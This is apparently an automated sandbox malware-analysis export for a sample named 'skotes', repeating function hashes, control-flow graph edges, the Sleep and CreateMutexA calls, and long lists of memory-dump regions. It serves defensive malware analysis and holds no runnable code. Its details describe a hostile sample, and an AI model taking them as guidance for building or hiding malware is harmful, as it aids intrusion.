                                                                                                                • Opcode ID: cace8c0511ab53ec016aadead3cf8e81e0f18f55c250242f826db9f1d9421dc0
                                                                                                                • Instruction ID: 43c2776c56c10fe45beaa033e921b363b966e3343164a2579f81dd04d5c60503
                                                                                                                • Opcode Fuzzy Hash: cace8c0511ab53ec016aadead3cf8e81e0f18f55c250242f826db9f1d9421dc0
                                                                                                                • Instruction Fuzzy Hash: B3316A71744204DBFB08BB78EC8D7ADBB62EB95310F648219E114973D6D73E59808762

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 22 789f44-789f64 26 789f92-789fae 22->26 27 789f66-789f72 22->27 28 789fdc-789ffb 26->28 29 789fb0-789fbc 26->29 30 789f88-789f8f call 79d663 27->30 31 789f74-789f82 27->31 35 78a029-78a916 call 7980c0 28->35 36 789ffd-78a009 28->36 33 789fbe-789fcc 29->33 34 789fd2-789fd9 call 79d663 29->34 30->26 31->30 37 78a92b 31->37 33->34 33->37 34->28 42 78a00b-78a019 36->42 43 78a01f-78a026 call 79d663 36->43 39 78a953-78a994 Sleep CreateMutexA 37->39 40 78a92b call 7b6c6a 37->40 52 78a996-78a998 39->52 53 78a9a7-78a9a8 39->53 40->39 42->37 42->43 43->35 52->53 54 78a99a-78a9a5 52->54 54->53
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: 4514d41d281868b654f0aa6664d9f340fa58829e54316e0f37c80045bf8c3dc0
                                                                                                                • Instruction ID: 580c6b885d88983c9092b8d9ee2e03d3bc0e0dd9cbab514d35d393d4f8cfa093
                                                                                                                • Opcode Fuzzy Hash: 4514d41d281868b654f0aa6664d9f340fa58829e54316e0f37c80045bf8c3dc0
                                                                                                                • Instruction Fuzzy Hash: 02316A31744104EBFB18BBB8DC8C7ADB762EB85310F24861AE158E72D1D73D59808712

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 56 78a079-78a099 60 78a09b-78a0a7 56->60 61 78a0c7-78a0e3 56->61 62 78a0a9-78a0b7 60->62 63 78a0bd-78a0c4 call 79d663 60->63 64 78a111-78a130 61->64 65 78a0e5-78a0f1 61->65 62->63 68 78a930-78a994 call 7b6c6a Sleep CreateMutexA 62->68 63->61 66 78a15e-78a916 call 7980c0 64->66 67 78a132-78a13e 64->67 70 78a0f3-78a101 65->70 71 78a107-78a10e call 79d663 65->71 72 78a140-78a14e 67->72 73 78a154-78a15b call 79d663 67->73 86 78a996-78a998 68->86 87 78a9a7-78a9a8 68->87 70->68 70->71 71->64 72->68 72->73 73->66 86->87 88 78a99a-78a9a5 86->88 88->87
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: abeccd2cb9b94822e9ff9ec4ade14e30f02cd776f2c7866df4fd54aec150fcbe
                                                                                                                • Instruction ID: 0698cffdf7e856f2e88b83f48ee38580103fd6dba439186e7fbdac63dfb90a62
                                                                                                                • Opcode Fuzzy Hash: abeccd2cb9b94822e9ff9ec4ade14e30f02cd776f2c7866df4fd54aec150fcbe
                                                                                                                • Instruction Fuzzy Hash: B5312831B84144ABFB18ABB8DC8DBADB772EB95314F24821AE014D73D1E73D59808712

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 90 78a1ae-78a1ce 94 78a1fc-78a218 90->94 95 78a1d0-78a1dc 90->95 96 78a21a-78a226 94->96 97 78a246-78a265 94->97 98 78a1de-78a1ec 95->98 99 78a1f2-78a1f9 call 79d663 95->99 100 78a228-78a236 96->100 101 78a23c-78a243 call 79d663 96->101 102 78a293-78a916 call 7980c0 97->102 103 78a267-78a273 97->103 98->99 104 78a935 98->104 99->94 100->101 100->104 101->97 107 78a289-78a290 call 79d663 103->107 108 78a275-78a283 103->108 110 78a953-78a994 Sleep CreateMutexA 104->110 111 78a935 call 7b6c6a 104->111 107->102 108->104 108->107 120 78a996-78a998 110->120 121 78a9a7-78a9a8 110->121 111->110 120->121 122 78a99a-78a9a5 120->122 122->121
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: 497d3be93df1a1d3e2809257700c26b085c7a8acee7721574cf623f30bb587ac
                                                                                                                • Instruction ID: df9b111e4e9e3a5847e3ceb543fa4e17734cfb40342957d9e7faf074e220ec4e
                                                                                                                • Opcode Fuzzy Hash: 497d3be93df1a1d3e2809257700c26b085c7a8acee7721574cf623f30bb587ac
                                                                                                                • Instruction Fuzzy Hash: 20312A31B44144EBFB18BBB8EC8DBADB772ABD6310F24461AE054972D1D73D59808712

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 124 78a418-78a438 128 78a43a-78a446 124->128 129 78a466-78a482 124->129 130 78a448-78a456 128->130 131 78a45c-78a463 call 79d663 128->131 132 78a4b0-78a4cf 129->132 133 78a484-78a490 129->133 130->131 136 78a93f-78a949 call 7b6c6a * 2 130->136 131->129 134 78a4fd-78a916 call 7980c0 132->134 135 78a4d1-78a4dd 132->135 138 78a492-78a4a0 133->138 139 78a4a6-78a4ad call 79d663 133->139 140 78a4df-78a4ed 135->140 141 78a4f3-78a4fa call 79d663 135->141 155 78a94e 136->155 156 78a949 call 7b6c6a 136->156 138->136 138->139 139->132 140->136 140->141 141->134 157 78a953-78a994 Sleep CreateMutexA 155->157 158 78a94e call 7b6c6a 155->158 156->155 160 78a996-78a998 157->160 161 78a9a7-78a9a8 157->161 158->157 160->161 162 78a99a-78a9a5 160->162 162->161
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: 694c55a41ecb04c3802a60c58a748593b0dff37e8844ec1921aab6e68e28b0ae
                                                                                                                • Instruction ID: c7a086517007d28fb2a44d9bbac2534586fc125fe9bd424a53bf413559c2334a
                                                                                                                • Opcode Fuzzy Hash: 694c55a41ecb04c3802a60c58a748593b0dff37e8844ec1921aab6e68e28b0ae
                                                                                                                • Instruction Fuzzy Hash: 96312731B44140EBFF18BBBCDC8DBADB662EB95314F20421AE0589B2D6D77D59808762

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 164 78a54d-78a56d 168 78a59b-78a5b7 164->168 169 78a56f-78a57b 164->169 172 78a5b9-78a5c5 168->172 173 78a5e5-78a604 168->173 170 78a57d-78a58b 169->170 171 78a591-78a598 call 79d663 169->171 170->171 176 78a944-78a949 call 7b6c6a 170->176 171->168 178 78a5db-78a5e2 call 79d663 172->178 179 78a5c7-78a5d5 172->179 174 78a632-78a916 call 7980c0 173->174 175 78a606-78a612 173->175 180 78a628-78a62f call 79d663 175->180 181 78a614-78a622 175->181 190 78a94e 176->190 191 78a949 call 7b6c6a 176->191 178->173 179->176 179->178 180->174 181->176 181->180 195 78a953-78a994 Sleep CreateMutexA 190->195 196 78a94e call 7b6c6a 190->196 191->190 198 78a996-78a998 195->198 199 78a9a7-78a9a8 195->199 196->195 198->199 200 78a99a-78a9a5 198->200 200->199
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
